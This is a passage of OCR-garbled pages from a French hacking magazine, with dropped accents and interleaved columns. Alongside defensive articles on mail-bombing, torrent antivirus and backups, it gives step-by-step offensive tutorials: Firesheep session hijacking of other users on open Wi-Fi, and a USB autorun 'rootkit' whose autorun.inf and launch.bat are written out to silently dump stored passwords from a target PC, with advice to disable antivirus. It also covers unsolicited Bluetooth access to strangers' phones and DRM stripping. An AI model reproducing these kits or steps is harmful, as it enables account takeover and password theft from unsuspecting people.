Avant dentrer dans le vif du sujet, il va falloir ins- Il suffit juste de cliquer sur licne correspondant
taller le logiciel WinPcap. Ce dernier analyse le au compte cible (vous pourrez parfois voir son
trafic de donnes entre les dispositifs de rseau. avatar ou son identifiant pour le reprer plus
Firesheep va simplement lutiliser pour fonction- facilement). a y est, vous avez tout les droits
ner correctement. Rendez-vous ensuite sur le
site dEric Butler pour tlcharger Firesheep. Il
sagit dun fichier au format XPI quil faudra juste

glisser-dplacer avec la souris dans nimporte
quelle fentre de Firefox pour quil sinstalle. Re-
dmarrez Firefox en cliquant sur le bouton...
2 Afficher
Pour afficher le module de Firesheep, faites
Affichage > Panneau latral > Firesheep. Vous
verrez alors linterface trs simple de ce plugin. Il
suffit de cliquer sur Start Capturing pour quen
quelques secondes des comptes apparaissent
sur le ct de votre fentre. Il peut sagir de nim-
porte quel compte appartenant un utilisateur
de votre rseau sans fil (ouvert, public, familial,
mal protg, etc.). Si cela ne fonctionne pas, cli-
quez sur lengrenage en bas gauche, allez sur
ou presque sur le compte de votre cible. Ce
subterfuge est limit car vous ne pouvez pas
voler le compte (interdire laccs au dtenteur)
mais la plupart du temps cela fonctionne assez
longtemps pour faire une ou deux blagues...
CE QU'IL VOUS FAUT
> Firesheep
http://codebutler.github.com/
firesheep
> WinPcap
Prfrences et dans longlet Capture essayez la www.winpcap.org
mthode Microsoft (au lieu de MS Tunnel Inter-
face Driver). DIFFICULT

> Comment a marche ?

Lorsque vous vous loguez un site en entrant nom dutilisateur et mot de passe, le serveur vrifie si un compte
correspondant existe et place un cookie (un petit fichier qui contient vos identifiants) sur votre ordinateur pour ne
pas avoir vous ridentifier pour toutes les autres requtes suivantes. La plupart des sites protgent votre mot de
passe en cryptant votre identification initiale mais il est plus rare quils cryptent autre chose. Si un tiers rcupre
ce cookie, il dtourne la session HTTP et devient alors lgitime pour le site : lui lenvoi demail, la rcupration
dinformation ou le piratage de votre site... Cest ce quon appelle le sidejacking. Et sur un rseau sans fil mal
scuris (ou pas scuris du tout comme le hotspot dun htel ou chez MacDo), il suffit de les intercepter la
vole... Bien sr certains sites cryptent aussi les cookies ou les font primer au bout dune priode dinactivit
mais devant la quantit dutilisateurs, de sites mal protgs et de rseaux sans fil, un contrevenant aura vite fait
de faire un malheur sil le dsire...

15
 Confectionnez-vous
UN ASPIRATEUR
DE MOTS
DE PASSE !
Plus de mmoire !
Attention, seuls les mots de passe
que vous avez choisi denregistrer
sur votre ordinateur seront resto-
rables (gnralement en cochant
la case Se souvenir de moi ou
Se souvenir de mes identifiants).
Pour viter de se faire piger par
des pirates la petite semaine,
souvenez-vous vous-mme de vos
identifiants !
Message inutile
Si lors de linsertion de la cl USB,
le PC cible vous demande de
choisir le logiciel pour ouvrir tel ou
tel fichier, ne prenez pas en compte
cette fentre. Allez directement dans
la racine de la cl et double cliquez
sur launch.bat...
Lastuce que nous allons vous dvoiler nest pas mettre
en toutes les mains ! Nous allons en effet vous expliquer
comment raliser un rootkit permettant de rcuprer tous les
mots de passe dun ordinateur. Inutile de voir le mal partout,
vous pouvez trs bien vous servir de ce rootkit pour aider un
ami ou une vieille tante qui a oubli ses identifiants ou tout
simplement tester la scurit de votre PC...
I
maginez une cl
USB quil suffirait
de brancher sur un
ordinateur pour
rcuprer instantanment plus de
90% des mots de passes enregistrs
lintrieur. Non il ne sagit pas du
dernier gadget de James Bond ou de
Jack Bauer mais du rootkit que sera
bientt le vtre ! Les services en ligne
et autres logiciels ont la sale manie de
demander lutilisateur si ce dernier de message
souhaite que ses identifiants restent (client mail
dans la mmoire de lordinateur. La par exemple). Avec
plupart des gens cochent la case oui notre rootkit stock sur cl
sans savoir que cette erreur peut-tre USB, vous pouvez mme faire
fatale. En effet, aprs un problme du dpannage domicile et pater
sur votre PC (contamination, etc.), la galerie en retrouvant les mots de
vous vous retrouvez parfois sans la passe que vos amis ont btement
possibilit de retrouver ces mots de oublis. Vous pourrez donc retrouver
passe que vous avez oubli depuis les mots de passe de MSN, dOutlook,
belle lurette (forcement, si vous ne les Thunderbird et tous les mots de passe
tapez pas tous les jours...). Vous devez qui ont transit par Internet Explorer,
donc rouvrir un compte et perdre un Firefox et Google Chrome. De mme,
temps fou retrouver vos amis (dans le vous retrouverez sans problme vos
cas dMSN) ou de perdre une quantit mots de passe rseau et WiFi.
16
 ANONYMAT HACKING
PIRATAGE
PRATIQUE Rcuprez tout
les mots de passe !
1 Les logiciels
Crer un nouveau dossier sur votre bureau et
tlchargez tous les logiciels qui figurent dans
lencadr. Dcompressez les fichiers ZIP et ne gardez
que les fichiers EXE. Copiez ensuite tous les fichiers
dans votre cl USB, directement en racine (ne pas les
mettre dans un dossier part).
2 Le fichier Autorun
Ouvrer le bloc-note de Windows (clic
doit>Nouveau>Document texte) et copier ce qui
suit :
[autorun]
open = launch.bat
ACTION = Scan Passwords
Enregistrez le fichier sous la racine de la cl en le
nommant autorun.inf
3 Le fichier Launch
Ouvrer un autre fichier texte et recopier ce qui suit :
start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start mspass.exe /stext mspass.txt
SELECTION LOGICIELS
Tous les logiciels ncessaires la confection de votre rootkit sont disponibles sur le site Nirsoft. Sils ne figurent pas en page de garde, il suffit de
taper leurs noms dans le champ de recherche.
MessenPass :
Il rcupre les mots de passe de la plupart des
messageries instantanes : MSN, Yahoo Messenger, ICQ,
AOL IM, Trillian, Miranda, GAIM, etc.
Mail PassView :
Il rvle les mots de passe des clients de messa-
gerie comme Outlook Express, Outlook
2000/2002/2003, IncrediMail, Eudora, Netscape Mail,
Mozilla Thunderbird, etc.
ChromePass :
La mme chose que IE Passview et PasswordFox
mais pour le navigateur Google Chrome.
PROTECTION
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start pspv.exe /stext pspv.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
Prenez bien garde ce que les noms des fichiers EXE
correspondent ce que vous crivrez dans le texte, on
ne sait jamais... Enregistrer ensuite votre document
(toujours en racine) sous le nom de launch.bat
4 Le test
Une fois que les 8 programmes et les deux fichiers
(INF et BAT) sont sur votre cl (le tout prend moins
dun Mo de mmoire), votre rootkit est prt ! Il y
a ensuite plusieurs cas de figure en fonction de
lordinateur su lequel vous allez tester le rootkit.
La plupart du temps, il suffira dinsrer la cl et de
cliquer sur Scan Password lorsque la petite fentre
apparatra. Mais parfois lautorun est dsactiv.
IE Passview :
Il soccupe des mots de passe qui sont utiliss
avec toutes les versions dInternet Explorer (de la v4 la
v7). Si vous utilisez Gmail, Paypal, eBay ou nimporte
quel autre service en ligne depuis IE, vous retrouverez
tous les identifiants de ces services.
PasswordFox :
La mme chose que IE Passview mais pour Firefox
Protected Storage PassView :
Rcupre les mots de passe stocks dans le
Protected Storage de Windows, un module utilis par de
nombreux services Microsoft
17
MULTIMDIA MICRO FICHES
notre
Dcouvrez en
rootkit cl CD
main sur le
Pas de problme, pour faire marcher notre astuce,
il suffira dinsrer la cl et de double cliquer sur le
fichier launch.bat.
5 Mots de passe !
Une fentre DOS va alors safficher et au bout de
2 secondes, plusieurs fichiers TXT vont se crer sur
votre cl USB : un par logiciel. Il vous suffira douvrir
ces fichiers pour profiter de votre rcolte. Vous
trouverez les noms des logiciels ou des services, les
login, les mots de passe et mme une apprciation
de la solidit du mot de passe. Attention, si vous
voulez recommencer lexprience sur un autre PC, les
fichiers TXT dj prsents seront crass...
CE QU'IL VOUS FAUT
> Les logiciels de Nir Sofer
www.nirsoft.net
DIFFICULT
Network Password Recovery :
Permet de rcuprer les mots de passe de votre
rseau local ou de votre compte Microsoft .NET Passport.
Attention ce dernier peut tre dtect comme une menace
par votre antivirus. Dsactivez votre antivirus quelque
temps pour pouvoir le tlcharger et travailler avec.
WirelessKeyView :
Idal lorsquon na pas son mot de passe WiFi
sous la main. Trs puissant, ce logiciel retrouve tous
les mots de passe des rseaux WiFi (WEP/WPA) qui ont
dj t connects votre ordinateur...mme de
passage dans un htel ou un McDo.
Se protger
du mail-
bombing
Comment viter le
mail bombing ?
Ne communiquez votre e-mail quaux
personnes dignes de confiance.
vitez de le placarder sur les forums,
les rseaux sociaux ou votre blog. Le mail-bombing est une attaque informatique qui consiste envoyer un
Nhsitez pas crer une seconde
adresse pour vos mailings lists ou
grand nombre de-mails vers un destinataire pour faire saturer sa bote de
autre activits annexes sur la Toile. rception. Elle fait deux victimes, le FAI qui doit subir le traitement de ces
Installer ou configurer un logiciel informations et rparer les dgts ainsi que le destinataire des messages
antispam pour interdire laccs aux
e-mails identiques envoys un qui ne peut plus recevoir de-mail pendant une priode non ngligeable.
intervalle de temps trs court est Alors, comment se mettre labri ?
aussi une bonne solution.

Quid de la loi ?
Tout dabord, la totalit des fournis-
seurs daccs interdisent dans leurs
conditions gnrales la pratique du
mail bombing. Les contrevenants
peuvent donc voir leur contrat rsili.
Latteinte un systme de traitement
automatis de donnes (STAD) est
aussi condamne par la loi (article
323-1 du Code pnal). Dernirement,
un mail-bomber a t condamn
8 mois de prison avec sursis et
20 000 euros de dommages et int-
rts par le TGI de Paris.
L
e mail-bombing fait parti de
moyens qui existent pour
ennuyer des tiers ou des
socits. Le principe rappelle
un peu lattaque DDoS dont nous vous
avions parl dans notre prcdent
numro. Sauf quici, il ne sagit pas
de saturer un site de requtes mais
de bombarder de-mails une bote
aux lettres. Au bout dun moment, le
serveur du FAI victime naccepte plus
les messages et les correspondances
lgitimes se perdent jamais. Cest
assez embtant pour un particulier
mais catastrophique pour une socit...
Bien sr, les pirates qui pratiquent ce
genre de sport ne le font pas depuis
leur Outlook Express ou leur compte
Hotmail, il faut pour cela un logiciel
spcial qui permet par exemple de
trafiquer les adresses dmetteurs, de
multiplier les serveurs de mail partir
duquel les messages seront mis, etc.
Le nombre de messages envoys est
colossal, parfois plus de 500 000 ! Cela
encombre bien sr la bande passante
du FAI de la victime et cette dernire
se retrouve alors avec un compte mail
inutilisable : essayez de rcuprer
500 000 e-mails sur votre Thunderbird !

18
 ANONYMAT HACKING PROTECTION
MAIL-BOMBING
PRATIQUE Anti mail-
bombing :
Filtrez vos e-mails avant
de les tlcharger
1 Tlchargement
Tlchargez larchive ZIP contenant le programme et dcompactez-le dans
un rpertoire que vous nommerez comme bon vous semble. Magic Mail
Monitor (MMM) ne ncessite aucune installation. Double-cliquez sur le
fichier EXE pour dmarrer le programme. Il va ensuite falloir paramtrer
votre compte e-mail sur MMM.
2 Paramtres
Cliquez sur Edit puis New Mailbox... Vous aurez alors le choix entre im-
porter un compte dOutlook Express (cette option fonctionne aussi avec le
Windows Mail de Vista et Windows 7) ou paramtrer un compte existant
de A Z. Cest cette option que nous allons choisir, cliquez sur Create
Empty. Dans la nouvelle fentre, entrez votre nom dutilisateur (Alias),
votre adresse mail (User) et votre nom de serveur (Host). Si vous ne
savez pas o trouver ces informations allez dans Outils>Paramtres des
comptes>Paramtres serveur dans Thunderbird ou Outils>Comptes dans
Windows Mail.
MULTIMDIA MICRO FICHES
CE QU'IL VOUS FAUT
> Magic Mail Monitor
http://mmm3.sourceforge.net
> Mozilla Thunderbird
www.mozillamessaging.com/fr/
thunderbird
DIFFICULT
3 Petits rglages...
Laissez le port 110 pour le POP3, noubliez pas de cocher NO RETR si
vous utilisez un compte Gmail et Use SSL si votre messagerie utilise cette
technologie de chiffrement. Entrez aussi votre mot de passe de messagerie
ou cochez Prompt for password si vous voulez quon vous le demande
chaque dmarrage. Longlet Command permet de dmarrer un client
lorsque de nouveaux e-mails sont arrivs. Playback et Message permettent
quant eux de rgler un son particulier ou louverture dun pop-up
larriv dun nouveau message. Enfin, Server donne des informations sur
votre serveur mail.
4 Chargez vos e-mails !
Lorsque vous avez fini vos rglages, cliquez sur OK puis tapez F5 (ou
licne Check Now ! en haut de la fentre principale). Vous verrez alors la
liste des messages qui attendent sur votre serveur. Les corps de messages
ne seront pas chargs ! Vous pouvez donc les supprimer distance sans
saturer votre bote mail en cas dattaque ! Si vous recevez des milliers
de-mails de la mme personne et que vous souhaitez obtenir des
informations pour porter plainte, il suffit de faire un clic droit dans un des
e-mails, de cliquer sur Item properties et douvrir longlet Raw Header...
19
Retrouver le coupable
Si vous avez t victime dun mail bombing, il est parfois
possible de remonter jusqu lmetteur.
En effet, il existe des informations dans chaque message qui
donnent des informations sur leur auteur. Ces informations
sont contenues dans len-tte du message (header en
anglais). Pour y accder, ouvrez un des messages, cliquez
sur Affichage puis sur Code source du message.
Received: from server.exemple.net [190.13.06.15] 1
by smtp.votre-FAI.com with ESMTP (SMTPD32-4.06) id
A09D3203BC;
Tue, 18 Jan 2010 14:18:56 EST
Received: from argamemnon ([192.288.14.1]) 2
by server15.exemple.net (8.7.5) ID LAA28548; 3
tue, 18 Jan 2010 14:19:11 -0700 (MST)
Message-ID: <007901be38dc$e19a50e0$01010118
@argamemnon> 4
Reply-To: billgates@micro$oft.com 5
From: pirate@chezlui.com 6
To: votre-adresse@votre-FAI.com 7
Subject: No subject 8
Date: tue, 18 Jan 2010 19:54:10 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset=iso-8759-2
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5 9
1 Adresse IP du serveur par lequel a transit le message
2 Adresse IP du pirate
3 Serveur SMTP utilis par le pirate
4 Nom rseau de lordinateur du pirate
5 Adresse o sera achemine votre rponse ventuelle
6 Adresse prsume du pirate (qui a sans doute
t falsifie)
7 Votre adresse email
8 Objet du mail
9 Client mail utilis par le pirate
Dans cet exemple, il faut envoyer votre plainte
abuse@exemple.net voire aussi postmaster@
exemple.net (en remplaant exemple.net par le
nom de domaine du FAI ou du serveur SMTP utilis
par le pirate, abuse et postmaster tant valides
avec nimporte quel FAI). Les FAI, qui apprcient
moyennement ce genre dattaques vous aideront
dans votre dmarche. Si votre bote est bloque, il
faudra utiliser le petit programme gratuit Magic Mail
Monitor (voir notre pas pas) : ce dernier vous permet
dexaminer le contenu de votre bote aux lettres
sans avoir charger les messages. Vous pourrez bien
sr supprimer les mails qui viennent du pirate (cela
fonctionne aussi pour les apams) tout en analysant
leurs en-ttes.

Filtrez en cas dattaques rptes !

Dans le cas de messages volumineux,
arrtez la rcupration du courrier en
cours depuis votre client, puis configurez
votre logiciel de messagerie pour quil
ne rcupre que les mails de taille
infrieure 20 Ko. Comme la plupart
de vos courriers changs avec vos
correspondants sont en dessous de
cette limite, vous rduirez la casse.
Si le mail-bombing de votre bote aux
lettres devient monnaie courante,
configurez le gestionnaire de la bote
de rception pour quil ne tlcharge
pas les messages provenant des
adresses incrimines et faites en sorte quil les dtruise Choisissez De dans le premier menu droulant, Contient
systmatiquement sur le serveur. Dans Thunderbird, (ou Est) dans le deuxime et tapez ladresse du pirate
il suffit de faire Outils>Filtres de messages. Cliquez dans le champ suivant. En dessous, slectionnez
ensuite sur le bouton Nouveau, choisissez un nom pour Supprimer du server POP et cliquez sur OK. Vous avez
le filtre et dans le premier encadr choisissez les critres cr un filtre qui supprimera automatiquement les mails
de filtrage. Dans notre cas, il sagit dun expditeur. de ce destinataire sans avoir les charger...

20
 LIBRE ET
ENGAG
3
90

PRIX CANON

+ CD OFFERT !

VOTRE MAGAZINE
Nouvelle Gnration
 EN DANGER !
Moins connu que le Wi-Fi, le Bluetooth est une norme de
communication sans fil utilis pour relier entre eux bon
nombre dappareils : tlphone, ordinateur, imprimante, auto-
radio, kit mains libres, PDA, etc. Trs permissif au niveau
de la scurit, le Bluetooth a su se muscler un peu au fil des
annes sans pour autant devenir une citadelle imprenable

Se protger
Pour viter de se faire pirater
votre tlphone portable par
exemple, cest trs simple. Il suffit
simplement de couper loption
Bluetooth. Vous pourrez lactiver
en cas de besoin et vous cono-
miserez la batterie ! Il est aussi
possible de choisir un mot de
passe pour viter les surprises.
Les tlphones Samsung sont
ce jour ceux qui permettent
de mieux se protger contre les
attaques.
Quelques dates
1994 : Cration de la technologie
L
e Bluetooth permet deux frquent que les appareils soient livrs
appareils quips de la sans que ces mesures de scurit
technologie de pouvoir ne soient actives. Lappareil reste
communiquer lun avec lautre donc continuellement visible par
pour schanger des informations : nimporte qui et ne demande pas
envoi dune photo sur un ordinateur, lintervention de son propritaire pour
communication dun tlphone valider la connexion. Dans ce cas, vous
une oreillette, etc. Pour commencer pouvez au pire vous faire voler vos SMS
lchange, le mode Bluetooth doit ou les dernires photos du Week-end
tre activ, les deux acteurs doivent la Bourboule Seulement voil,
valider lchange et ventuellement avec certains logiciels (pouvant tre
schanger un mot de passe (sauf install sur un smartphone, un PDA
exception, le Bluetooth a une porte ou un netbook), les pirates peuvent
dune dizaine de mtres, le ssame aller plus loin : vol de votre carnet
peut trs bien se donner de vive voix). dadresse, utilisation frauduleuse de
Malheureusement, les utilisateurs votre tlphone et de votre connexion
sont souvent ngligeant en matire Internet, extinction du tlphone,
de nouvelle technologie et il est coute cache, etc.
SELECTION LOGICIELS

par Ericsson
1998 : Cration du Bluetooth
Special Interest Group par IBM,
Intel, Nokia, Microsoft, Motorola, etc.
1999 : Sortie de la version 1.0 et
dbut de la dmocratisation de la
technologie
2006 : Sortie de la version 2.0
permettant dassurer des dbits
thoriques 100 fois plus importants
(12 Mo/s)
Pour vous amuser ou pour bidouiller un peu votre connexion Bluetooth, voici quelques
logiciels disponibles pour PC ou sur tlphone portable permettant de reprer des
priphriques, dobtenir des informations dessus ou faire des tests de pntrations.
BlueScanner
BlueScanner est un petit logiciel PC permettant de dtecter les priphriques Bluetooth autour de vous.
Il balaye lenvironnement sans essayer de sy connecter et vous donne un paquet dinformations sur ces
derniers : nom, adresse, type, heure de la dernire apparition, etc. Optez pour la version la plus rcente
que vous pouvez puisque la reconnaissance des priphriques se fait partir dune base de donnes
interne.
http://sourceforge.net/projects/bluescanner

22
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
BLUETOOTH

PRATIQUE Vous connectez via

Bluetooth sans invitation
Ce tuto est rserv aux tlphones compatibles Java (donc presque tous) mais il fonctionne plus
ou moins bien selon le modle cible et le modle o il est install. Voici une liste de compatibilit :
http://tinyurl.com/23b4vqq
pendra du tlphone que vous voudrez
1 Installation atteindre mais il vous sera possible de
Commencez par tlcharger le fichier JAR composer un numro, avoir accs au r-
puis utilisez votre logiciel de transfert pertoire, au SMS et pratiquement tous
pour le placer sur votre tlphone. Une les rglages

fois sur lappareil, installez le programme

et attendez quil dmarre. BT INFO est un
logiciel Slovne, il va falloir le paramtrer
pour langlais. Choisissez Nastavenia
puis Jazyk et slectionnez English dans
la list. Cliquez sur Options puis Spt.
sur un de ces priphriques et attendez
que BT INFO trouve son adresse (com-
mence par btspp://)

2 Scannez
Dans Settings, vous aurez plusieurs op-
tions trs anecdotiques. Allez directement
sur Connect puis Inquiry Devices. Le
programme va vous demander dauto-
riser lactivation du Bluetooth avant de
commencer scanner les alentour la
recherche de priphrique Wi-Fi. Cliquez
3 La connexion
Slectionnez cette adresse et laissez
le temps au logiciel de se connecter. CE QU'IL VOUS FAUT
Vous pouvez auparavant placer ce p- > BT Info (gratuit)
riphrique dans vos favoris en cliquant
sur Options>To List. Une fois connect, www.thomas.hoornstra.org/hack
vous aurez alors un menu disposition.
Le nombre doptions qui sera affich d- DIFFICULT

Bluetooth Browser Keep Bluechattin Bluetooth Remote

Il sagit dune application Java que vous pouvez
installer sur un tlphone compatible ou sur
un PDA. Bluetooth Browser permet dexplorer
les spcifications techniques des priphriques
Bluetooth activs.
Vous pouvez visualiser ces informations ainsi que
les profils utilisateurs de chaque priphrique. Il
fait peu prs la mme chose que BlueScanner
sans avoir transporter de PC ou de netbook
www.brothersoft.com/downloads/
bt-browser.html
Keep Bluechattin nest pas un logiciel qui teste
la scurit mais nous lavons ajout la liste
parce quil est assez sympa. Une fois install sur
votre tlphone ou PDA compatible avec Windows
Mobile, vous pourrez envoyer des messages et
tchatter avec les propritaires des appareils Blue-
tooth environnant sans quils aient pralablement
install quoique ce soit. Un mode permet denvoyer
un message automatiquement tous les appareils
du coin lorsque vous tes prsents.
www.axyzmobile.com
Control
Toujours sous Windows Mobile, ce logiciel permet
tout simplement de contrler vos applications PC
avec votre tlphone : Winamp, Windows Media
Player, PowerPoint, etc. Installez le client sur votre
PC, synchronisez votre appareil puis tablissez
la connexion entre les deux Bien sr, il faut
pour cela que votre PC dispose dune connexion
Bluetooth.
http://bluetooth-remote-control.
softonic.fr/windowsmobile

23

Un premier pas ?
Comme la fait Barnes & Noble, il
y a quelque temps dj, Amazon
vient dautoriser le prt de livres
numriques entre possesseurs de
Kindle pendant une dure limite de
14 jours. Fait amusant, comme pour
une version papier, le livre nest plus
Enlever
les DRM
dun livre
numrique
Vous tes un adepte de la lecture numrique et vous aimeriez
pouvoir utiliser comme vous le souhaitez vos achats effectus
sur des plates-formes lgales Et pourtant, vous tes sans cesse
limits par ces satans DRM (Digital Rights Management) ! Et si ce
ntait plus un problme ?

disponible sur le lecteur du prteur
pendant toute la dure du prt.
Google eBookStore
2011 sera lanne de louvertre de
la librairie en ligne de Google. Pour
linstant uniquement disponible
au Etats-Unis, ce service se base
sur les millions de livres numriss
depuis 2004 dans le cadre du projet
Google Books. Mme si un espace de
stockage en ligne sera de la partie,
les utilisateurs auront la possibilit
de tlcharger un exemplaire de leur
achat...sous DRM.
L
a technique est au point, les
lecteurs se dmocratisent,
les catalogues stoffent
enfin Cette fois a y
est, le livre numrique commence
trouver son public ! Mais un
problme demeure : les ebooks
disponibles sur les plates-formes
lgales sont pour la plupart affubls
de DRM, ces protections qui
empchent le transfert des fichiers
dun lecteur un autre !
Un vritable flau
Lindustrie du livre semble pour
linstant reproduire la lettre les
erreurs commises jadis par celles de la
musique ou du cinma. La volont de
leadership et la protection des droits
dauteur poussent les plates-formes
de tlchargement ne proposer
quasiment que des fichiers bourrs
de DRM. croire que les diteurs ne
se soucient gure des milliards de
clients potentiels quils gagneraient
en proposant une interoprabilit
des contenus (combien de gens
achteraient leur livre favori en
version numrique sils pouvaient le
lire sur leur tlphone ?).
Si simple combattre !
Quand vous achetez un livre, quil
soit numrique ou en papier, vous

24
 ANONYMAT
PRATIQUE Retirer les DRM
dun livre
1 Acheter le livre
Rendez-vous sur une plateforme de vente
de livre numriques. Nous avons choisi
ePagines.fr, lune des plus connues en France.
Une fois notre livre achet, nous recevons un
e-mail de confirmation contenant le lien de
tlchargement du livre. Avant de cliquer sur
ce lien, il nous faut installer le logiciel gratuit
Adobe Digital Editions.
2 Vos identifiants
Tlchargez le logiciel Adobe Digital Edition
ladresse http://www.adobe.com et installez-
le. Crez des identifiants Adobe (cela devrait
vous tre propos durant linstallation) afin de
vous connecter et de pouvoir faire le lien entre
la bibliothque et votre ordinateur.
avez envie de le lire nimporte
o et surtout de pouvoir le
prter vos amis Mais les DRM
lempchent. Imaginez que vous
ayez achet un livre numrique
sur une clbre plateforme
comme La Fnac ou ePagines.
Vous commencez le lire sur
votre PC, puis vous dcider de le
transfrer sur votre iPhone et
l, cest le drame ! Lcran affiche
HACKING PROTECTION
EBOOK
3 Lire le livre
Mme si ce nest pas notre but final, cette
tape est obligatoire. Cliquez sur le lien
contenu dans le-mail envoy par ePagines.
Votre livre est tlcharg et il souvre
directement dans Adobe Digital Editions. Lors
de cette opration, un fichier .epub va tre
cr dans le dossier C:/User/Documents/
My digital editions.
4 Cryptographie
Le nom fait peur mais lopration nest pas
complique ! Tlchargez et installez les
logiciels Python (version 2.6 pour Windows
Vista ou 2.7.1 pour Windows 7) et PyCrypto
(version 2.0.1). Tlchargez enfin (on
les trouve facilement en cherchant dans
Google) les scripts Python ineptkey.pyw et
ineptepub.pyw.
un terrible message : Ce livre ne
peut tre ouvert car son format
nest pas valide. La faute aux
DRM, videmment ! Il vous reste
alors 2 solutions : acheter le livre
une deuxime fois sur iTunes (
condition quil soit disponible)
ou le pirater pour obtenir un
fichier sans DRM, ce qui nest
pas la bonne solution car cela
ne ferait que donner raison aux
25
MULTIMDIA MICRO FICHES
5 Retirer les DRM
Double-cliquez sur le fichier ineptkey.pyw.
Un nouveau fichier, baptis adeptkey.der, est
alors cr. Double-cliquez ensuite sur le fichier
ineptepub.pyw. Lorsque ce dernier est lanc, il
vous propose de remplir trois champs diffrents.
Dans le champ Key file, allez chercher le
fameux fichier adeptkey.der que vous venez
de crer. Dans Input file, indiquez le fichier
.epub contenu dans votre dossier My digital
editions. Enfin dans Output file, choisissez
lemplacement o vous souhaitez stocker votre
nouveau fichier qui sera dpourvu DRM. Pour
terminer, cliquez sur Decrypt ! Votre achat est
maintenant libre et interoprable...
CE QU'IL VOUS FAUT
> Python (Gratuit)
www.python.org
> PyCrypto (Gratuit)
http://pycrypto.sourceforge.net
DIFFICULT
diteurs. Quoi quil en soit, ces
derniers ont tout intrt prendre
conscience du fait que les DRM
sont loin dtre une solution face
au piratage. Dautant plus que
retirer les DRM dun livre afin
de pouvoir le lire sur nimporte
quel support est simple comme
bonjour puisque la mthode est
la mme avec presque toute les
plates-formes.
VIRUS GUARD,
lantivirus pour
BitTorrent
Avec un nombre toujours croissant dutilisateurs dans
le monde, le protocole BitTorrent est un des modes
dchange de fichiers parmi les plus populaires. Pas
tonnant de voir de plus en plus de menaces dinfections
venir de vos tlchargements Torrent. Heureusement
Virus Guard est arriv...

100 000 000 !

Depuis labsorbsion de Torrent
par le client historique BitTorrent,
les deux logiciels comptent plus de
100 millions dutilisateurs actifs
mensuels. Au quotidien, ce sont plus
de 20 millions dinternautes qui
utilisent soit lun ou lautre de ces
clients. Dernirement Eric Klinker, le
PDG de la socit sest flicit de la

taille de leur base dutilisateurs et de
la puissance des logiciels.
Avec le client
BitTorrent
Si vous utilisez le client historique
BitTorrent, sachez que la procdure
est exactement la mme. Les
interfaces de ce dernier et de Torrent
sont devenus exactement les mmes.
www.bittorrent.com
I
ssu dun partenariat entre la
socit ditrice dantivirus
BitDefender et BitTorrent (qui
a absorb le client Torrent),
Virus Guard est une application de
scurit autonome intgre aux clients
BitTorrent et Torrent permettant
danalyser vos tlchargements quand
ils sont termins. Si un malware ou
une tentative de contamination est
dtect, lapplication signale le torrent
mis en cause et agit en consquence
: mise en quarantaine, suppression,
etc. Le but est de vous proposer un
antivirus intgr linterface de votre
client avec un rcapitulatif des scans.
Lide est de ne jamais laisser un virus,
un ver ou un trojan se dissminer via le
rseau P2P et stopper la propagation
ds quil a t tlcharg. Pour vous, prsentation ou un fichier annexe.
cest aussi loccasion dviter les
contaminations sur votre poste en
cliquant dans un fichier vrol.
Un vritable phnomne
de socit
En effet le protocole, autrefois
confidentiel est devenu un vritable
phnomne de socit au point
que certains matriels Hi-Fi porte
dsormais lestampille BitTorrent.
Il nest donc pas tonnant de voir de
plus en plus de fichiers Torrent qui
redirigent vers des fakes ou vers
des virus. Parfois, la ficelle est trop
grosse et lutilisateur aura dmasqu
la supercherie de lui-mme (taille qui
ne correspond pas, etc.) mais parfois
le malware peut se cacher dans une

26
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
ANTIVIRUS

PRATIQUE Utiliser Virus Guard

avec Torrent
1 Torrent 2.2
Commencez par tlcharger la nouvelle ver-
sion de Torrent sur le site de lditeur ou
mettez jour votre logiciel en cliquant dans
?>Vrifiez les mises jour. Aprs avoir t-
lcharg cette nouvelle version 2.2, le logi-
3 Le Torrent
Dans la partie Settings, vous pouvez co-
cher les deux cases pour que Virus Guard
se charge au dmarrage de Torrent et pour
mettre jour la base virale si elle date de
plus de 24 heures. Noubliez pas de cliquer
sur Apply. Si vous avez dj un Torrent de
tlcharg (fini 100% et en seed) vous
contaminer par un tlchargement non fi-
nalis sont trs minces. Pour lancer le scan,
cliquez sur votre Torrent pour le mettre en
surbrillance puis cliquez sur licne clible
en haut de la fentre. Vous pouvez aussi
lancer lanalyse depuis le menu Virus Guard
sur la gauche.
5 Le rsultat
Dans la colonne Scanned, vous verrez ltat
davancement du scan (ou ventuellement
de la mise jour des fichiers de signatures).
Lopration est trs rapide, elle prend moins

ciel va automatiquement se relancer. Vous

verrez alors dans la colonne de gauche un
menu Applications.
2 Le plugin
Cliquez sur ce menu pour afficher la tota-
lit des plugins proposs par Torrent dans
le panneau de droite. Slectionnez Virus
Guard puis suivez les indications affiches
lcran pour poursuivre linstallation.
Dans le panneau, vous verrez votre nouvelle
application.
pouvez lancer un scan immdiatement.
Dans le cas contraire il faudra attendre pour
que Virus Guard commence son expertise. dune seconde pour un fichier de 700 Mo...
Une fois termin vous pourrez voir la date
laquelle lanalyse a t effectue dans
4 Le scan cette mme colonne ct des .torrent qui
En effet, pour obtenir une protection de ont t traits.
tous les instants, il faudra tlcharger la
version payante de BitDefender Internet
Security. Nanmoins, les risques de faire
CE QU'IL VOUS FAUT
> Virus Guard (gratuit)
www.utorrent.com/intl/fr/apps
> Torrent (gratuit)
www.utorrent.com

DIFFICULT

Les autres applications

Une fois que vous avez la dernire version de BitTorrent ou
de Torrent, vous aurez disposition dautres Apps dans la
mme section (tape 2 de notre pas pas). Il y en a pour tous
les gots. Vous pourrez par exemple intgrer VLC votre client
pour lire directement vos mdias depuis linterface, voir sur une
carte les diffrents peers avec uMap ou corriger vos tags ID3
avec TuneUp. Il nexiste pour linstant que 17 applications mais
leur nombre devrait augmenter dans les semaines venir...

27
 Sauvegardez
votre systme
(avant quil ne soit
trop tard !)

Mme avec un bon antivirus et un firewall bien configur, personne nest

NTBackup sur XP
Si vous ne souhaitez pas installer de
logiciel supplmentaire sur votre ma-
labri dune contamination ou dun crash de disque dur. Cest lorsque
tout va bien quil faut penser faire des sauvegardes ! Gratuit et plutt
bien conu, UltraBackup est un logiciel qui permet de mettre en lieu sr
la demande ou intervalle rgulier ses donnes les plus prcieuses

U
chine, avec Windows XP vous avez aussi
